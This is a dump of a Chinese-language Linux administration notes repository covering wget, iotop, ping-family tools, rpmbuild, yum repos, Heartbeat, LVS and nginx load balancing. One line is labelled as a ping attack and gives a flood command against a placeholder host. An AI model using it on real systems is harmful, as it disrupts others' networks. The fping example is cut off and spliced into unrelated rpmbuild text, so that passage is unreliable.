44 |
45 | wget --mirror -p --convert-links -P ./DIR http://URL
46 |
47 | **11、排除某种类型文件**
48 |
49 | --reject=png
50 |
51 | 配合 下载整个网站使用
52 |
53 | **12、下载保存日志**
54 |
55 | wget -o LOG http://URL
56 |
57 | **13、设置下载限制**
58 |
59 | wget -Q1G http://URL
60 |
61 | **14、递归下载,指定文件类型**
62 |
63 | wget -r -A.png http://URL
64 |
65 | **15、代理**
66 |
67 | wget -e "http_proxy=http://IP:PORT" http://URL
68 | wget -e "https_proxy=http://IP:PORT" http://URL
69 |
70 | **16、debug **
71 |
72 | wget -d http://URL
73 |
74 | **17、指定refer **
75 |
76 | wget --referer=http://URL http://URL
77 |
78 | **18、添加header **
79 |
80 | wget --header="test:test1" http://URL
81 |
82 | **19、指定cookies**
83 |
84 | wget --load-cookies cookies.txt http://URL
85 |
86 | **20、post 请求**
87 |
88 | wget --post-data "username=xxx&&password=xxx" http://URL
89 | #### 二、配置文件
90 |
91 | - .wgetrc
92 |
93 |
94 | 略
95 |
96 | - /etc/wgetrc
97 |
98 |
99 | 略
100 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/xfsci-pankuo-zhan-inode.md:
--------------------------------------------------------------------------------
1 | # xfs文件系统磁盘扩展inode值
2 |
3 | **现象:**
4 |
5 | 磁盘inode数量被占满了,磁盘又没有办法清理
6 |
7 | **扩展inode值:**
8 |
9 | # df -i
10 | /dev/sdb 195297280 195283626 195283626 100% /data
11 |
12 |
13 | # xfs_growfs -m 10 /data
14 | meta-data=/dev/sdb isize=512 agcount=4, agsize=122060800 blks
15 | = sectsz=512 attr=2, projid32bit=1
16 | = crc=1 finobt=0 spinodes=0
17 | data = bsize=4096 blocks=488243200, imaxpct=5
18 | = sunit=0 swidth=0 blks
19 | naming =version 2 bsize=4096 ascii-ci=0 ftype=1
20 | log =internal bsize=4096 blocks=238400, version=2
21 | = sectsz=512 sunit=0 blks, lazy-count=1
22 | realtime =none extsz=4096 blocks=0, rtextents=0
23 | inode max percent changed from 5 to 10
24 |
25 |
26 | # df -i | grep data
27 | /dev/sdb 1171783680 195283626 1171770026 17% /data
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-yi-3001-jian-kong.md
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/grafana.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-yi-3001-jian-kong/grafana.md
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/jian-kong-ming-ling-ji-he.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 | - nicstat:
4 | - oprofile:
5 | - perf:
6 | - systemtap:
7 | - iotop:
8 | - blktrace:
9 | - dstat:
10 | - strace:
11 | - pidstat:
12 | - vmstat:
13 | - slabtop:
14 | - tcpdump:
15 | - free:
16 | - mpstat:
17 | - netstat:
18 | - tcprstat:
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/jian-kong-ming-ling-ji-he/iotop.md:
--------------------------------------------------------------------------------
1 | ### 一、安装iotop
2 |
3 | yum -y install iotop
4 | ### 二、iotop 使用
5 |
6 | **1、查看帮助**
7 |
8 | # iotop -h
9 | Usage: /usr/sbin/iotop [OPTIONS]
10 |
11 | DISK READ and DISK WRITE are the block I/O bandwidth used during the sampling
12 | period. SWAPIN and IO are the percentages of time the thread spent respectively
13 | while swapping in and waiting on I/O more generally. PRIO is the I/O priority at
14 | which the thread is running (set using the ionice command).
15 |
16 | Controls: left and right arrows to change the sorting column, r to invert the
17 | sorting order, o to toggle the --only option, p to toggle the --processes
18 | option, a to toggle the --accumulated option, q to quit, any other key to force
19 | a refresh.
20 |
21 | Options:
22 | --version show program's version number and exit
23 | -h, --help show this help message and exit
24 | -o, --only only show processes or threads actually doing I/O
25 | -b, --batch non-interactive mode
26 | -n NUM, --iter=NUM number of iterations before ending [infinite]
27 | -d SEC, --delay=SEC delay between iterations [1 second]
28 | -p PID, --pid=PID processes/threads to monitor [all]
29 | -u USER, --user=USER users to monitor [all]
30 | -P, --processes only show processes, not all threads
31 | -a, --accumulated show accumulated I/O instead of bandwidth
32 | -k, --kilobytes use kilobytes instead of a human friendly unit
33 | -t, --time add a timestamp on each line (implies --batch)
34 | -q, --quiet suppress some lines of header (implies --batch)
35 |
36 | **2、字段解释**
37 |
38 | --version #显示版本号
39 | -h, --help #显示帮助信息
40 | -o, --only #显示进程或者线程实际上正在做的I/O,而不是全部的,可以随时切换按o
41 | -b, --batch #运行在非交互式的模式
42 | -n NUM, --iter=NUM #在非交互式模式下,设置显示的次数,
43 | -d SEC, --delay=SEC #设置显示的间隔秒数,支持非整数值
44 | -p PID, --pid=PID #只显示指定PID的信息
45 | -u USER, --user=USER #显示指定的用户的进程的信息
46 | -P, --processes #只显示进程,一般为显示所有的线程
47 | -a, --accumulated #显示从iotop启动后每个线程完成了的IO总数
48 | -k, --kilobytes #以千字节显示
49 | -t, --time #在每一行前添加一个当前的时间
50 | -q, --quiet #suppress some lines of header (implies --batch). This option can be specified up to three times to remove header lines.
51 |
52 | **3、使用实例**
53 |
54 | 1) 直接查看
55 | iotop
56 |
57 | 可操作:
58 | <- -> 左右移动
59 | r 反向排序
60 | o 切换到 --only 模式
61 | a 切换到 --accumulated 模式
62 | p 切换到 --processes 模式
63 | q 退出
64 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/jian-kong-ming-ling-ji-he/netstat.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-yi-3001-jian-kong/jian-kong-ming-ling-ji-he/netstat.md
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he.md:
--------------------------------------------------------------------------------
1 |
2 | 名称|作用
3 | -|-
4 | ping | 网络探测
5 | fping | 批量网络探测
6 | arping |arp探测
7 | tcping |tcp探测
8 | httping |http请求探测
9 | hping | 综合探测
10 |
11 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/1ping.md:
--------------------------------------------------------------------------------
1 | ###ping命令常用方法
2 |
3 | **1、探测网络**
4 |
5 | ping www.baidu.com
6 |
7 | **2、指定ping 个数**
8 |
9 | ping -c 10 www.baidu.com
10 |
11 | **3、指定ping 的间隔时间**
12 |
13 | ping -i 0.1 www.baidu.com
14 |
15 | **4、指定网络接口**
16 |
17 | ping -I eth0 www.baidu.com
18 |
19 | **5、指定ping 包大小**
20 |
21 | ping -s 60000 www.baidu.com
22 |
23 | **6、快速ping**
24 |
25 | ping -f www.baidu.com
26 |
27 | **7、ping攻击**
28 |
29 | ping -f -s 60000 XXX
30 |
31 | **8、ping 广播地址**
32 |
33 | ping -b broadcast
34 |
35 | **9、禁|解ping**
36 |
37 | 禁止:
38 | echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
39 |
40 | 允许:
41 | echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
42 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/3httping.md:
--------------------------------------------------------------------------------
1 | ###arping命令常用方法
2 |
3 | **1、获取mac地址**
4 |
5 | arping 192.168.1.1
6 |
7 | **2、指定网卡**
8 |
9 | arping -I eth0 192.168.1.1
10 |
11 | ** 3、指定源地址**
12 |
13 | arping -s 192.168.1.100 192.168.1.1
14 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/4tcping.md:
--------------------------------------------------------------------------------
1 | ###tcping命令常用方法
2 |
3 | **1、探测端口**
4 |
5 | tcping www.baidu.com 80
6 |
7 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/4tcping/5httping.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/4tcping/5httping.md
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/5httping.md:
--------------------------------------------------------------------------------
1 | ###httping命令常用方法
2 |
3 | **1、探测站点**
4 |
5 | 域名:httping www.baidu.com
6 | httping -h 61.135.169.121
7 | ip: httping 61.135.169.121
8 | httping -h 61.135.169.121
9 | url:httping -g http://www.baidu.com
10 |
11 | **2、指定次数**
12 |
13 | httping -c10 -g http://www.baidu.com
14 |
15 | **3、输出http code **
16 |
17 | httping -g http://www.baidu.com -s
18 |
19 | **4、输出颜色**
20 |
21 | httping -g http://www.baidu.com -s -Y
22 |
23 | **5、代理**
24 |
25 | httping -x IP:PORT -g http://www.baidu.com
26 |
27 | **6、不缓存**
28 |
29 | httping -Z -g http://www.baidu.com
30 | httping --no-cache -g http://www.baidu.com
31 |
32 | **7、指定referer**
33 |
34 | httping -R http://m.baidu.com -g http://www.baidu.com
35 | httping --referer http://m.baidu.com -g http://www.baidu.com
36 |
37 | **8、指定UA**
38 |
39 | httping -I "my UA"-g http://www.baidu.com
40 | httping --user-agent "my UA" -g http://www.baidu.com
41 |
42 | **9、输出每个阶段时间**
43 |
44 | httping -g http://www.baidu.com -S
45 |
46 | resolve, connect, send, etc
47 |
48 | PING www.baidu.com:80 (/):
49 | connected to 61.135.169.121:80 (312 bytes), seq=0 time= 2.18+ 1.38+ 1.72+ 1.63+ 0.04= 6.93 ms
50 | connected to 61.135.169.125:80 (312 bytes), seq=1 time= 1.56+ 1.29+ 2.89+ 2.71+ 0.04= 8.45 ms
51 | connected to 61.135.169.125:80 (312 bytes), seq=2 time= 2.07+ 3.32+ 1.75+ 2.04+ 0.03= 9.18 ms
52 |
--------------------------------------------------------------------------------
/chapter1/shi-yi-3001-jian-kong/pinggong-ju-ji-he/fping.md:
--------------------------------------------------------------------------------
1 | ###fping命令常用方法
2 |
3 | **1、ping 多个地址**
4 |
5 | 方法一:
6 | fping 192.168.1.1 192.168.1.2
7 |
8 | 方法二:
9 | vim ip.txt
10 | www.baidu.com
11 | www.qq.com
12 |
13 | fping 1> 首先,需要把源代码放到%\_sourcedir中;
46 | > 2> 然后,进行编译,编译的过程是在%\_builddir中完成的,所以需要先把源代码复制到这个目录下边,一般情况下,源代码是压缩包格式,那么就解压过来即可;
47 | > 3> 第三步,进行“安装”,这里有点类似于预先组装软件包,把软件包应该包含的内容(比如二进制文件、配置文件、man文档等)复制到%\_buildrootdir中,并按照实际安装后的目录结构组装,比如二进制命令可能会放在/usr/bin下,那么就在%\_buildrootdir下也按照同样的目录结构放置;
48 | > 4> 然后,需要配置一些必要的工作,比如在实际安装前的准备啦,安装后的清理啦,以及在卸载前后要做的工作啦等等,这样也都是通过配置在SPEC文件中来告诉rpmbuild命令;
49 | > 5> 还有一步可选操作,那就是检查软件是否正常运行;
50 | > 6> 最后,生成的RPM包放置到%\_rpmdir,源码包放置到%\_srpmdir下。
51 |
52 | **4、阶段介绍**
53 |
54 | ---
55 |
56 | | 阶段 | 读取的目录 | 写入的目录 | 具体动作 |
57 | | :--- | :--- | :--- | :--- |
58 | | %prep | %_sourcedir | %_builddir | 读取位于 %_sourcedir 目录的源代码和 patch 。之后,解压源代码至 %_builddir 的子目录并应用所有 patch。 |
59 | | %build | %_builddir | %_builddir | 编译位于 %_builddir 构建目录下的文件。通过执行类似 ./configure && make 的命令实现。 |
60 | | %install | %_builddir | %_buildrootdir | 读取位于 %_builddir 构建目录下的文件并将其安装至 %_buildrootdir 目录。这些文件就是用户安装 RPM 后,最终得到的文件。注意一个奇怪的地方: 最终安装目录 不是 构建目录。通过执行类似 make install 的命令实现。 |
61 | | %check | %_builddir | %_builddir | 检查软件是否正常运行。通过执行类似 make test 的命令实现。很多软件包都不需要此步。 |
62 | | bin | %_buildrootdir | %_rpmdir | 读取位于 %_buildrootdir 最终安装目录下的文件,以便最终在 %_rpmdir 目录下创建 RPM 包。在该目录下,不同架构的 RPM 包会分别保存至不同子目录, noarch 目录保存适用于所有架构的 RPM 包。这些 RPM 文件就是用户最终安装的 RPM 包。 |
63 | | src | %_sourcedir | %_srcrpmdir | 创建源码 RPM 包(简称 SRPM,以.src.rpm 作为后缀名),并保存至 %_srcrpmdir 目录。SRPM 包通常用于审核和升级软件包。 |
64 |
65 |
66 | ### 三、实例
67 |
68 | **1、制作nginx **
69 |
70 | ```
71 | 略
72 | ```
73 |
74 | **2、制作php**
75 |
76 | ```
77 | 略
78 | ```
79 |
80 | **3、制作mysql**
81 |
82 | ```
83 | 略
84 | ```
85 |
86 |
87 |
88 |
--------------------------------------------------------------------------------
/chapter1/yumyuan-fu-wu-qi-bu-shu/zi-ding-yi-yum-yuan.md:
--------------------------------------------------------------------------------
1 | ###一、安装软件包
2 |
3 | yum -y install createrepo
4 |
5 | ###二、创建yum源
6 |
7 | #准备好下载的包及目录
8 |
9 | createrepo ./
10 |
11 | #查看版本信息
12 | createrepo -v ./
13 |
14 | #更新yum 源
15 | createrepo --update ./
16 |
17 |
18 | #配置yum 配置
19 | vim /etc/yum.repos.d/local_base.repo
20 | name=local yum
21 | baseurl=file:////DIR
22 | gpgcheck=0
23 | enabled=1
24 | priority=1
25 |
26 | ###三、网络yum源
27 |
28 | 安装web服务器-指定目录
29 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/da-shu-ju-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/da-shu-ju-fu-wu.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/heartbeat.md:
--------------------------------------------------------------------------------
1 | * [heartbeat 安装](fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/heartbeat/heartbeat-an-zhuang.md)
2 | * [heartbeat-centos7编译安装](fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/heartbeat/heartbeat-centos7bian-yi-an-zhuang.md)
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/heartbeat/heartbeat-an-zhuang.md:
--------------------------------------------------------------------------------
1 | # Heartbeat 安装 #
2 |
3 |
4 | ### 一、环境初始化 ###
5 |
6 | **1、主机名**
7 |
8 | server-node1 192.168.160.101
9 | server-node2 192.168.160.102
10 | virt-ip 192.168.160.200
11 |
12 | **2、配置ntp 时间同步**
13 |
14 | crontab -e
15 | */5 * * * * ntpupdate ntpserver
16 |
17 | **3、清除iptables or 开启UDP 694端口**
18 |
19 | iptables -F
20 | iptables -X
21 | iptables -Z
22 | /etc/init.d/iptables save
23 | /etc/init.d/iptables stop
24 |
25 | **4、配置epel源**
26 |
27 | rpm -ivh https://mirrors.aliyun.com/epel/epel-release-latest-6.noarch.rpm
28 |
29 | **5、安装软件**
30 |
31 | yum -y install heartbeat
32 |
33 | ### 二、配置heartbeat ###
34 | **1、配置文件管理**
35 |
36 | - 秘钥文件 权限 600 authkeys
37 | - heartbeat 服务的配置 ha.cf
38 | - 资源管理配置文件 haresources
39 |
40 | **2、拷贝模板文件**
41 |
42 | cp -p /usr/share/doc/heartbeat-3.0.4/authkeys /etc/ha.d/
43 | cp /usr/share/doc/heartbeat-3.0.4/ha.cf /etc/ha.d/
44 | cp /usr/share/doc/heartbeat-3.0.4/haresources /etc/ha.d/
45 |
46 | **3、修改authkeys配置文件**
47 |
48 | vim /etc/ha.d/authkeys
49 | ####添加,使用MD5验证,验证密码是www.peter-zhou.com
50 | auth 1
51 | 1 md5 www.peter-zhou.com
52 |
53 | **4、修改ha.cf 配置文件**
54 |
55 | vim /etc/ha.d/ha.cf
56 |
57 | #日志记录方式,rsyslog 或者指定路劲
58 | logfacility local0
59 |
60 | #探测间隔时间,可以为毫秒 1500ms 代表 1.5秒
61 | keepalive 1
62 | deadtime 30
63 | warntime 10
64 |
65 | #启动准备时间
66 | initdead 120
67 | udpport 694
68 |
69 | #心跳方式:单播、组播、广播
70 | ucast eth0 192.168.160.102
71 | auto_failback on
72 |
73 | #指定节点主机名: 与uname -n 对应
74 | node rsync-node1
75 | node rsync-node2
76 |
77 | #三方仲裁ip
78 | ping_group group1 192.168.160.2
79 |
80 | ** 5、修改 haresources 配置**
81 |
82 | vim /etc/ha.d/haresources
83 | #指定主节点 #共享资源IP #共享服务
84 | rsync-node1 IPaddr::192.168.160.200/24/eth0 httpd
85 |
86 |
87 | **6、同步配置到另一台机器(单播IP不一样)**
88 |
89 |
90 | **7、启动服务**
91 |
92 | /etc/init.d/heartbeat start
93 |
94 |
95 |
96 |
97 | **官方地址:**[http://clusterlabs.org/](http://clusterlabs.org/)
98 |
99 | **官方地址2:**[http://www.linux-ha.org/wiki/Main_Page](http://www.linux-ha.org/wiki/Main_Page)
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/heartbeat/heartbeat-centos7bian-yi-an-zhuang.md:
--------------------------------------------------------------------------------
1 | ### 一、安装依赖环境
2 |
3 | yum install -y bzip2 autoconf automake libtool glib2-devel libxml2-devel bzip2-devel libtool-ltdl-devel asciidoc libuuid-devel psmisc
4 |
5 | ### 二、组件包 ###
6 | **1、安装glue**
7 |
8 | wget http://hg.linux-ha.org/glue/archive/0a7add1d9996.tar.bz2
9 | tar jxvf 0a7add1d9996.tar.bz2
10 | cd Reusable-Cluster-Components-glue--0a7add1d9996/
11 | groupadd haclient
12 | useradd -g haclient hacluster
13 | ./autogen.sh
14 | ./configure --prefix=/usr/local/heartbeat/
15 | make
16 | make install
17 |
18 | **2、安装Resource Agents**
19 |
20 | wget https://github.com/ClusterLabs/resource-agents/archive/v3.9.6.tar.gz
21 | tar zxvf v3.9.6.tar.gz
22 | cd resource-agents-3.9.6/
23 | ./autogen.sh
24 | export CFLAGS="$CFLAGS -I/usr/local/heartbeat/include -L/usr/local/heartbeat/lib"
25 | ./configure --prefix=/usr/local/heartbeat/
26 |
27 | vi /etc/ld.so.conf.d/heartbeat.conf
28 | /usr/local/heartbeat/lib
29 | ldconfig
30 |
31 |
32 | make
33 | make install
34 |
35 | **3、安装HeartBeat**
36 |
37 | wget http://hg.linux-ha.org/heartbeat-STABLE_3_0/archive/958e11be8686.tar.bz2
38 | tar jxvf 958e11be8686.tar.bz2
39 | cd Heartbeat-3-0-958e11be8686
40 | ./bootstrap
41 | export CFLAGS="$CFLAGS -I/usr/local/heartbeat/include -L/usr/local/heartbeat/lib"
42 | ./configure --prefix=/usr/local/heartbeat/
43 | vi /usr/local/heartbeat/include/heartbeat/glue_config.h
44 | /*define HA_HBCONF_DIR “/usr/local/heartbeat/etc/ha.d/”*/ (注意这行用/**/注释掉)
45 | make
46 | make install
47 |
48 |
49 | **4、拷贝文件**
50 |
51 | cp /usr/local/heartbeat/share/doc/heartbeat/ha.cf /usr/local/heartbeat/etc/ha.d
52 | cp /usr/local/heartbeat/share/doc/heartbeat/authkeys /usr/local/heartbeat/etc/ha.d
53 | cp /usr/local/heartbeat/share/doc/heartbeat/haresources /usr/local/heartbeat/etc/ha.d
54 |
55 | **5、映射插件**
56 |
57 | ln -svf /usr/local/heartbeat/lib64/heartbeat/plugins/RAExec/* /usr/local/heartbeat/lib/heartbeat/plugins/RAExec/
58 | ln -svf /usr/local/heartbeat/lib64/heartbeat/plugins/* /usr/local/heartbeat/lib/heartbeat/plugins/
59 |
60 |
61 | ### 三、注意 ###
62 |
63 | **1、如果单机测试必须要包含 备份节点的node**
64 |
65 | 实例:
66 | #vim ha.cf
67 | debugfile /var/log/ha-debug
68 | logfile /var/log/ha-log
69 |
70 | logfacility local0
71 | keepalive 2
72 | deadtime 30
73 | warntime 10
74 | initdead 60
75 | udpport 694
76 | ucast eth0 10.0.0.101
77 | auto_failback on
78 |
79 | node heartbeat
80 | node heartbeat2
81 |
82 | #vim authkeys
83 | auth 1
84 | 1 crc
85 |
86 | #vim haresources
87 | heartbeat IPaddr::10.0.0.200/24/eth0 irqbalance
88 |
89 |
90 |
91 | **2、必须使用主机名长格式**
92 | **3、必须有解析**
93 | **4、authkeys 必须为600权限**
94 | **5、不支持调用systemd 服务**
95 |
96 |
97 |
98 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/keepalive.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/keepalive.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/lvs.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/lvs.md
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/lvs/lvs-dr.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ++++++++++++
4 | +Client + eth0 192.168.1.1/24
5 | ++++++++++++
6 | |
7 | |
8 |
9 | ++++++++++++ up eth0 192.168.1.254/24
10 | |----------> + GW +
11 | | ++++++++++++ down eth1 1.1.1.254/24
12 | | |
13 | | |
14 | | ++++++++++++ VIP eth0:1 1.1.1.1/24
15 | | + Director +
16 | | ++++++++++++ DIP eth0 1.1.1.100/24
17 | | |
18 | |__________________|_______________
19 | | |
20 | | |
21 | ++++++++++++ ++++++++++++
22 | + Real Server A + + Real Server B +
23 | ++++++++++++ ++++++++++++
24 | eth0 1.1.1.10/24 eth0 1.1.1.20/24
25 |
26 |
27 | **1、数据包走向**
28 |
29 | 1.Client---------->GW
30 | sip:CIP dip:VIP
31 | smac:Client_mac dmac:GW_up_mac
32 |
33 | 2.GW-------------->Director
34 | sip:CIP dip:VIP
35 | smac:GW_down_mac dmac:VIP_mac
36 |
37 | 3.Director-------->Real Server
38 | ******************************************************************
39 | * Director在给Real Server发包前要广播找Real Server mac *
40 | * sip: DIP sip: RIP *
41 | * smac: DIP_mac dmac: broadcast *
42 | * *
43 | * sip: RIP dip: DIP *
44 | * smac: RealServer_mac dmac: DIP_mac *
45 | ******************************************************************
46 | sip:CIP dip:VIP
47 | smac:DIP_mac dmac:RealServer_mac
48 |
49 | 4.Real Server----->GW
50 | sip:VIP dip:CIP
51 | smac:RealServer_mac dmac:GW_down_mac
52 |
53 | 5.GW-------------->Client
54 | sip:VIP dip:CIP
55 | smac:GW_up_mac dmac:Client_mac
56 |
57 |
58 |
59 | **2、配置LVS VS/NAT模式**
60 |
61 | Client:
62 |
63 | [root@localhost ~]# route add default gw 192.168.1.254 dev eth0
64 |
65 |
66 | GW:
67 |
68 | [root@localhost ~]# echo 1 > /proc/sys/net/ipv4/ip_forward
69 |
70 |
71 | Real Server A & Real Server B:
72 |
73 | [root@localhost ~]# yum install httpd
74 | [root@localhost ~]# ifconfig lo:1 1.1.1.1/32
75 | [root@localhost ~]# echo 1 > /proc/sys/net/ipv4/conf/eth0/arp_ignore
76 | [root@localhost ~]# echo 2 > /proc/sys/net/ipv4/conf/eth0/arp_announce
77 |
78 |
79 | Director:
80 |
81 | [root@localhost ~]# yum install ipvsadm
82 | [root@localhost ~]# ipvsadm -A -t 1.1.1.1:80 -s rr
83 | [root@localhost ~]# ipvsadm -a -t 1.1.1.1:80 -r 1.1.1.10:80 -g
84 | [root@localhost ~]# ipvsadm -a -t 1.1.1.1:80 -r 1.1.1.20:80 -g
85 | [root@localhost ~]# ipvsadm -Ln
86 | [root@localhost ~]# ipvsadm -Ln --stats
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/lvs/lvs-nat.md:
--------------------------------------------------------------------------------
1 |
2 | ++++++++++++
3 | + Client + eth0 192.168.1.1/24
4 | ++++++++++++
5 | |
6 | |
7 | ++++++++++++ up eth0:192.168.1.254/24
8 | + GW +
9 | ++++++++++++ down eth1:1.1.1.254/24
10 | |
11 | |
12 | ++++++++++++ VIP eth0:1.1.1.1/24
13 | + Director +
14 | ++++++++++++ DIP eth1:172.16.1.254/24
15 | |
16 | ___________|____________
17 | | |
18 | | |
19 | ++++++++++++ ++++++++++++++
20 | + Real Server A + + Real Server B +
21 | ++++++++++++ ++++++++++++++
22 | eth0:172.16.1.1/24 eth0:172.16.1.2/24
23 |
24 |
25 |
26 |
27 | **1、配置LVS VS/NAT模式**
28 |
29 | Client:
30 |
31 | [root@localhost ~]# route add default gw 192.168.1.254 dev eth0
32 |
33 |
34 | GW:
35 |
36 | [root@localhost ~]# echo 1 > /proc/sys/net/ipv4/ip_forward
37 |
38 |
39 | Real Server A & Real Server B:
40 |
41 | [root@localhost ~]# yum install httpd
42 | [root@localhost ~]# route add default gw 172.16.1.254 dev eth0
43 |
44 |
45 | Director:
46 |
47 | [root@localhost ~]# echo 1 > /proc/sys/net/ipv4/ip_forward
48 | [root@localhost ~]# route add default gw 1.1.1.254 dev eth0
49 | [root@localhost ~]# yum install ipvsadm
50 | [root@localhost ~]# ipvsadm -A -t 1.1.1.1:80 -s rr
51 | [root@localhost ~]# ipvsadm -a -t 1.1.1.1:80 -r 172.16.1.1:80 -m
52 | [root@localhost ~]# ipvsadm -a -t 1.1.1.1:80 -r 172.16.1.2:80 -m
53 | [root@localhost ~]# ipvsadm -Ln
54 | [root@localhost ~]# ipvsadm -Ln --stats
55 |
56 |
57 | **2、数据包走向**
58 |
59 | 1.Client---------->GW
60 |
61 | sip:CIP dip:VIP
62 | smac:Client_mac dmac:GW_up_mac
63 |
64 | 2.GW-------------->Director
65 | sip:CIP dip:VIP
66 | smac:GW_down_mac dmac:VIP_mac
67 |
68 | 3.Director-------->Real Server (DNAT)
69 | sip:CIP dip:RIP
70 | smac:DIP_mac dmac:RealServer_mac
71 |
72 | 4.Real Server----->Director
73 | sip:RIP dip:CIP
74 | smac:RealServer_mac dmac:DIP_mac
75 |
76 | 5.Director-------->GW
77 | sip:VIP dip:CIP
78 | smac:VIP_mac dmac:GW_down_mac
79 |
80 | 6.GW-------------->Client
81 | sip:VIP dip:CIP
82 | smac:GW_up_mac dmac:Client_mac
83 |
--------------------------------------------------------------------------------
/fu-wu-bu-shu/fu-zai-jun-8861-gao-ke-yong-fu-wu/nginx.md:
--------------------------------------------------------------------------------
1 | Nginx proxy 是 Nginx 的王牌功能,利用 proxy 基本可以实现一个完整的 7 层负载均。
2 |
3 | - 功能强大,性能卓越,运行稳定。
4 | - 配置简单灵活。
5 | - 能够自动剔除工作不正常的后端服务器。
6 | - 上传文件使用异步模式。
7 | - 支持多种分配策略,可以分配权重,分配方式灵活。
8 |
9 |
10 |
11 | ++++++++++++
12 | + Client + 192.168.122.1/24 (真实机做客户端)
13 | ++++++++++++
14 | |
15 | |
16 | ++++++++++++ 192.168.122.254/24
17 | + Nginx +
18 | ++++++++++++
19 | |
20 | ________________________|_______________________
21 | _______________|__________ ___________|________
22 | | | | |
23 | ++++++++++++ ++++++++++++ ++++++++++++ ++++++++++++
24 | + HTML A + + HTML B + + PHP A + + PHP B +
25 | ++++++++++++ ++++++++++++ ++++++++++++ ++++++++++++
26 | eth0 192.168.122.10/24 eth0 192.168.122.20/24 eth0 192.168.122.30/24 eth0 192.168.122.40/24
27 |
28 |
29 | HTML A & HTML B
30 |
31 | [root@localhost ~]# yum install httpd
32 | 分别创建测试页面 index.html ,开启服务
33 |
34 | PHP A & php B
35 |
36 | [root@localhost ~]# yum install httpd
37 | 分别创建测试页面 index.php ,开启服务
38 |
39 |
40 | 安装配置Nginx
41 |
42 | [root@localhost ~]# rpm -ivh nginx-0.6.36-1.el5.i386.rpm
43 | [root@localhost ~]# vim /etc/nginx/nginx.conf
44 | location / {
45 | root /usr/share/nginx/html;
46 | index index.html index.htm;
47 | if ($request_uri ~* \.html$) {
48 | proxy_pass http://htmlserver;
49 | }
50 | if ($request_uri ~* \.php$) {
51 | proxy_pass http://phpserver;
52 | }
53 | }
54 |
55 | [root@localhost ~]# vim /etc/nginx/conf.d/test.conf
56 | upstream htmlserver {
57 | server 192.168.122.10;
58 | server 192.168.122.20;
59 | }
60 | upstream phpserver {
61 | server 192.168.122.30;
62 | server 192.168.122.40;
63 | }
64 |
65 | [root@localhost ~]# service nginx start
66 |
67 |
68 | 在客户端访问 Nginx 测试
69 |
70 | [root@localhost ~]# elinks –dump http:// 192.168.122.254
71 | [root@localhost ~]# elinks –dump http:// 192.168.122.254/index.html
72 | [root@localhost ~]# elinks –dump http:// 192.168.122.254/index.php
--------------------------------------------------------------------------------
/fu-wu-bu-shu/he-xin-gong-neng-fen-lei-pei-zhi.md:
--------------------------------------------------------------------------------
